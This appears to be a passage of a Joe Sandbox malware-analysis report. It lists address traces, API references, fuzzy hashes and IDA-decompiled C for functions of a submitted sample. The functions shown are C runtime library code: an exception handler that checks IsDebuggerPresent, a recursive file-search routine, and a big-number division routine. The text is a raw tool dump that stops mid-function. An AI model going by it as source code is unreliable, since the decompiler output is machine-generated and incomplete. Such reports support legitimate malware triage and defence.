0x00e62a1b
0x00e62a21
0x00e62a26
0x00e62a32
0x00e62a3f
0x00e62a4c
0x00e62a52
0x00e62a55
0x00e62a62
0x00e62a62
0x00e62a62
0x00e62a64
0x00e62a66
0x00e62a66
0x00e62a6c
0x00e62a6f
0x00e62a7b
0x00e62a7b
0x00e62a7d
0x00e62a7d
0x00e62a88
0x00e62a8a
0x00e62a8f
0x00e62a95
0x00e62a9b
0x00e62aa4
0x00e62ab4
0x00e62ab4
0x00e62a9d
0x00e62a9d
0x00e62a9f
0x00e62a9f
0x00e62ab6
0x00e62acc
0x00e62ad2
0x00e62ae0
0x00e62aeb
0x00e62af6
0x00e62af9
0x00e62b0b
0x00e62b19
0x00e62b24
0x00e62b34
0x00e62b42
0x00e62b45
0x00e62b4a
0x00e62b4d
0x00e62b50
0x00e62b53
0x00e62b56
0x00e62b58
0x00e62b5a
0x00e62b5c
0x00e62b5c
0x00e62b5a
0x00e62b65
0x00e62b6b
0x00e62b71
0x00e62bb6
0x00e62bb6
0x00e62bb9
0x00e62bc3
0x00e62bc5
0x00e62bd7
0x00e62bd7
0x00e62be1
0x00e62be1
0x00e62be7
0x00e62be9
0x00e62bf3
0x00e62bf8
0x00e62bfa
0x00e62bfc
0x00e62c06
0x00e62c06
0x00e62bf8
0x00e62c0d
0x00e62c10
0x00e62c1c
0x00e62c1c
0x00000000
0x00e62c12
0x00e62c12
0x00e62c15
0x00000000
0x00000000
0x00e62c19
0x00e62c1e
0x00e62c1e
0x00e62c2a
0x00e62c2a
0x00e62c2c
0x00e62c32
0x00e62c60
0x00e62c64
0x00e62c66
0x00e62c68
0x00e62c68
0x00e62c68
0x00e62c6b
0x00e62c6b
0x00e62c76
0x00e62c7c
0x00e62c83
0x00e62c89
0x00e62c8b
0x00e62c91
0x00e62c98
0x00e62c9e
0x00e62ca5
0x00e62cab
0x00e62cab
0x00e62cb1
0x00e62cb4
0x00e62cb9
0x00e62cbc
0x00e62cbe
0x00e62cc0
0x00e62cc2
0x00e62cc2
0x00e62cd0
0x00e62cd5
0x00e62cd7
0x00e62cdb
0x00e62ce2
0x00e62d63
0x00e62d6d
0x00e62d78
0x00e62d7b
0x00e62d82
0x00e62d84
0x00e62d84
0x00e62d84
0x00e62d87
0x00e62d89
0x00e62e95
0x00e62d8f
0x00e62d98
0x00e62d9b
0x00e62daa
0x00e62db4
0x00e62db8
0x00e62dbf
0x00e62dc1
0x00e62dc7
0x00e62dce
0x00e62dd7
0x00e62ddd
0x00e62dde
0x00e62dea
0x00e62dee
0x00e62df4
0x00e62df6
0x00e62dfe
0x00e62e04
0x00e62e06
0x00e62e10
0x00e62e12
0x00e62e1d
0x00e62e25
0x00e62e30
0x00e62e4c
0x00e62e5c
0x00e62e62
0x00e62e65
0x00e62e70
0x00e62e78
0x00e62e7d
0x00e62e80
0x00e62e83
0x00e62e86
0x00e62e88
0x00e62e8a
0x00e62e8d
0x00e62e8d
0x00e62e88
0x00e62dce
0x00e62dc1
0x00e62e9e
0x00e62ea5
0x00e62ea7
0x00e62ea9
0x00e62ea9
0x00e62ce4
0x00e62ce6
0x00e62ce9
0x00e62cec
0x00e62cf3
0x00e62cf8
0x00e62d04
0x00e62d09
0x00e62d0c
0x00e62d0e
0x00e62d10
0x00e62d23
0x00e62d2d
0x00e62d2d
0x00e62d32
0x00e62d32
0x00e62d32
0x00e62d34
0x00e62d37
0x00e62d39
0x00e62d3b
0x00e62d40
0x00e62d47
0x00e62d48
0x00e62d48
0x00e62d50
0x00e62d50
0x00e62eb0
0x00e62eb7
0x00e62ec5
0x00e62ec5
0x00e62ed3
0x00e62ed8
0x00e62edf
0x00e62fc3
0x00e62fe4
0x00e62fed
0x00e62ff9
0x00e62fff
0x00e63007
0x00e63009
0x00e63016
0x00e6301d
0x00e63022
0x00e63026
0x00e63033
0x00e63033
0x00e63026
0x00000000
0x00e62ee5
0x00e62ee8
0x00e62ef6
0x00e62eff
0x00e62f08
0x00e62f0b
0x00e62f0d
0x00e62f0f
0x00e62f12
0x00e62f14
0x00e62f17
0x00e62f1a
0x00e62f1c
0x00e62f24
0x00e62f26
0x00e62f29
0x00000000
0x00000000
0x00e62f2f
0x00e62f34
0x00000000
0x00000000
0x00e62f36
0x00e62f38
0x00e62f47
0x00e62f47
0x00e62f54
0x00e62f59
0x00e62f5c
0x00e62f5e
0x00e62f5e
0x00e62f5e
0x00e62f5e
0x00e62f61
0x00e62f63
0x00e62f66
0x00e62f66
0x00e62f69
0x00e62f9a
0x00e62f9a
0x00e62f9a
0x00e62fa1
0x00e62fa8
0x00e62fad
0x00e62f6b
0x00e62f6d
0x00e62f70
0x00e62f70
0x00e62f73
0x00e62f76
0x00e62f78
0x00e62f85
0x00e62f87
0x00e62f8d
0x00e62f8f
0x00e62f92
0x00e62f92
0x00e62f92
0x00e62f97
0x00000000
0x00e62f97
0x00e62fb0
0x00e62fb0
0x00e62fb1
0x00e62fb4
0x00e62fb4
0x00e62fbd
0x00e62fc0
0x00000000
0x00e62fc0
0x00e62edf
0x00e62c3f
0x00e62c41
0x00e62c46
0x00e62c4a
0x00e62c4c
0x00e62c5a
0x00e62c5c
0x00000000
0x00e62c5c
0x00e62c4e
0x00e62c51
0x00000000
0x00000000
0x00e62c55
0x00000000
0x00e62c56
0x00e62c10
0x00e62bc7
0x00e62bc9
0x00000000
0x00000000
0x00e62bcb
0x00e62bcd
0x00e62bcf
0x00e62bcf
0x00000000
0x00e62b73
0x00e62b73
0x00e62b73
0x00e62b76
0x00e62bac
0x00000000
0x00e62bac
0x00e62b79
0x00e62b79
0x00e62b7c
0x00e62ba0
0x00000000
0x00e62ba0
0x00e62b7e
0x00e62b7e
0x00e62b81
0x00e62b94
0x00e62b94
0x00000000
0x00e62b94
0x00e62b83
0x00e62b86
0x00000000
0x00000000
0x00e62b88
0x00000000
0x00e62b88
0x00e62b71
0x00e62a71
0x00e62a74
0x00000000
0x00000000
0x00e62a78
0x00000000
0x00e62a78
0x00e62a57
0x00e62a5a
0x00000000
0x00e62a5c
0x00e62a5c
0x00e62a5e
0x00000000
0x00e62a5e
0x00e62a5a
0x00e62959
0x00e6295c
0x00000000
0x00e62962
0x00e6296e
0x00e62976
0x00e6297e
0x00e6298d
0x00e62995
0x00e62998
0x00e6299e
0x00e629a4
0x00e629aa
0x00e629ac
0x00e629b6
0x00e629b6
0x00e629bc
0x00e629c3
0x00e629d1
0x00e629d4
0x00e629da
0x00e629da
0x00000000
0x00e629c3
0x00e6295c
0x00e628f9
0x00e62900
0x00000000
0x00000000
0x00000000
0x00e62900
0x00e628f0
0x00e628f0
0x00000000
0x00e62891
0x00e62893
0x00e631e9
0x00e631ec
0x00e631fa
0x00e63205
0x00e63205
0x00e6288f
0x00e6282b
0x00e6282d
0x00000000
0x00e6282d
0x00e627b1
0x00e627b3
0x00e627b5
0x00e627bb
0x00000000
0x00e627c7
0x00e627c9
0x00e627cd
0x00e627df
0x00e627ec
0x00000000
0x00e627ee
0x00e627fe
0x00e6280f
0x00e62814
0x00000000
0x00e62814
0x00e627ec

APIs

__EH_prolog.LIBCMT ref: 00E62776
_strlen.LIBCMT ref: 00E62D04

Part of subcall function 00E71692: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00E6B842,00000000,?,?,?,000202B6), ref: 00E716AE

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E62E65

Strings

CMT, xrefs: 00E62E98

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: 3f354f64cb783d4b747db7c4f7a46709257d3000229e3e7a01cca67efc13231e
Instruction ID: ff364035c5431076424989f62a760089999258dfebdde5fb13d6462c659d4944
Opcode Fuzzy Hash: 3f354f64cb783d4b747db7c4f7a46709257d3000229e3e7a01cca67efc13231e
Instruction Fuzzy Hash: 95625871A406448FCF28DF38D8856FA3BE1EF54344F04557EED9AAB282DB71A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E8898F Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00E8898F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xe9e668; // 0x8ae5c3d8
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00E7F351(_t41);
					_pop(_t62);
				}
				E00E7F5F0(_t67,  &_v804, 0, 0x50);
				E00E7F5F0(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00E7F351(_t57);
				}
				return E00E7EEFA(_v8 ^ _t70);
			}

0x00e8898f
0x00e8898f
0x00e8898f
0x00e8898f
0x00e8899a
0x00e8899f
0x00e889a1
0x00e889a9
0x00e889ab
0x00e889ae
0x00e889b3
0x00e889b3
0x00e889bf
0x00e889d2
0x00e889e0
0x00e889e6
0x00e889ec
0x00e889f2
0x00e889f8
0x00e889fe
0x00e88a04
0x00e88a0a
0x00e88a10
0x00e88a16
0x00e88a1d
0x00e88a24
0x00e88a2b
0x00e88a32
0x00e88a39
0x00e88a40
0x00e88a41
0x00e88a4a
0x00e88a50
0x00e88a50
0x00e88a53
0x00e88a59
0x00e88a66
0x00e88a6f
0x00e88a78
0x00e88a81
0x00e88a8f
0x00e88a91
0x00e88a97
0x00e88aa6
0x00e88ab2
0x00e88ab5
0x00e88aba
0x00e88ac9

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E88A87
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E88A91
UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00E88A9E

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1a471d9cdaeeb380f41fbc2935846372e2f09a3afbf2ccdae1691727df020067
Instruction ID: d1bde5bac4b7d9a38058793a7e4679f5d34900e19531e6387dcba8e04af7cfbf
Opcode Fuzzy Hash: 1a471d9cdaeeb380f41fbc2935846372e2f09a3afbf2ccdae1691727df020067
Instruction Fuzzy Hash: C031C67590122CABCB61DF65D98979DB7F8BF08310F5091EAE80CA7250EB309F858F44

Uniqueness

Uniqueness Score: -1.00%

Function 00E8ADB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E8ADB8(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00E888C9(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00E8EB71(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00E8AFF7(_a16, _t101, __eflags, _t111);
							E00E887FE(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00E8EB71(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00E88B69();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0xe9e668; // 0x8ae5c3d8
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00E8EBC0(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00E7F5F0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00E8ADB8(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00E85D80(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00E8AC10);
									}
								} else {
									_push(_t55);
									_t57 = E00E8ADB8(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E00E8ADB8(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E00E7EEFA(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x00e8adbd
0x00e8adbe
0x00e8adc1
0x00e8adc1
0x00e8adc4
0x00e8adc4
0x00e8adc6
0x00e8adc7
0x00e8add0
0x00e8add1
0x00e8add4
0x00e8add7
0x00e8addc
0x00e8ade3
0x00e8ade4
0x00e8ade5
0x00e8ade8
0x00e8adf2
0x00e8adf5
0x00e8adf6
0x00e8adf8
0x00e8ae0c
0x00e8ae0c
0x00e8ae0f
0x00e8ae19
0x00e8ae1e
0x00e8ae21
0x00e8ae23
0x00000000
0x00e8ae25
0x00e8ae29
0x00e8ae32
0x00e8ae38
0x00000000
0x00e8ae3b
0x00e8adfa
0x00e8adfa
0x00e8ae00
0x00e8ae05
0x00e8ae08
0x00e8ae0a
0x00e8ae41
0x00e8ae43
0x00e8ae44
0x00e8ae45
0x00e8ae46
0x00e8ae47
0x00e8ae48
0x00e8ae4d
0x00e8ae51
0x00e8ae53
0x00e8ae59
0x00e8ae60
0x00e8ae63
0x00e8ae66
0x00e8ae67
0x00e8ae6a
0x00e8ae6b
0x00e8ae6e
0x00e8ae6f
0x00e8ae90
0x00e8ae90
0x00e8ae92
0x00000000
0x00000000
0x00e8ae77
0x00e8ae79
0x00e8ae7b
0x00e8ae7d
0x00e8ae7f
0x00e8ae81
0x00e8ae83
0x00e8ae8e
0x00000000
0x00e8ae8e
0x00e8ae83
0x00e8ae7f
0x00000000
0x00e8ae7b
0x00e8ae94
0x00e8ae96
0x00e8ae99
0x00e8aeb2
0x00e8aeb2
0x00e8aeb4
0x00e8aeb7
0x00e8aec7
0x00e8aec9
0x00e8aec9
0x00e8aeb9
0x00e8aeb9
0x00e8aebc
0x00000000
0x00e8aebe
0x00e8aebe
0x00e8aec1
0x00000000
0x00e8aec3
0x00e8aec3
0x00e8aec3
0x00e8aec1
0x00e8aebc
0x00e8aecf
0x00e8aed7
0x00e8aedb
0x00e8aee9
0x00e8aeee
0x00e8af03
0x00e8af05
0x00e8af0b
0x00e8af0e
0x00e8af40
0x00e8af40
0x00e8af42
0x00e8af45
0x00e8af4b
0x00e8af4b
0x00e8af52
0x00e8af6c
0x00e8af6c
0x00e8af7b
0x00e8af80
0x00e8af83
0x00e8af85
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8af54
0x00e8af54
0x00e8af5a
0x00e8af5c
0x00000000
0x00e8af5e
0x00e8af5e
0x00e8af61
0x00000000
0x00e8af63
0x00e8af63
0x00e8af6a
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8af6a
0x00e8af61
0x00e8af5c
0x00000000
0x00e8af87
0x00e8af8f
0x00e8af95
0x00e8af97
0x00e8af97
0x00e8af9f
0x00e8afa4
0x00e8afac
0x00e8afaf
0x00e8afb1
0x00e8afc5
0x00e8afca
0x00e8af10
0x00e8af10
0x00e8af14
0x00e8af1c
0x00e8af1c
0x00e8af1c
0x00e8af1e
0x00e8af21
0x00e8af24
0x00e8af24
0x00e8ae9b
0x00e8ae9e
0x00e8aea0
0x00000000
0x00e8aea2
0x00e8aea2
0x00e8aea8
0x00e8aead
0x00e8aea0
0x00e8af31
0x00e8af3c
0x00000000
0x00000000
0x00000000
0x00e8ae0a
0x00e8adde
0x00e8ade0
0x00e8ae3c
0x00e8ae40
0x00e8ae40
0x00000000

Strings

., xrefs: 00E8AF4B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: a8f63065dfa8e88277b31ea5ebe71a88f433a9a8ff0ef698299cd5ae4f7aa361
Instruction ID: 4ae96f76a641aeb37658f2c46e74f4f92cd9544f6ce7f4ad2c240a6c76e9da47
Opcode Fuzzy Hash: a8f63065dfa8e88277b31ea5ebe71a88f433a9a8ff0ef698299cd5ae4f7aa361
Instruction Fuzzy Hash: 1C3107B19002096FDB24AE78CC84EFB7BBDDB85308F4805AAF51DE7251E6309D858B51

Uniqueness

Uniqueness Score: -1.00%

Function 00E8CEB0 Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E00E8CEB0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00E7EA70(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
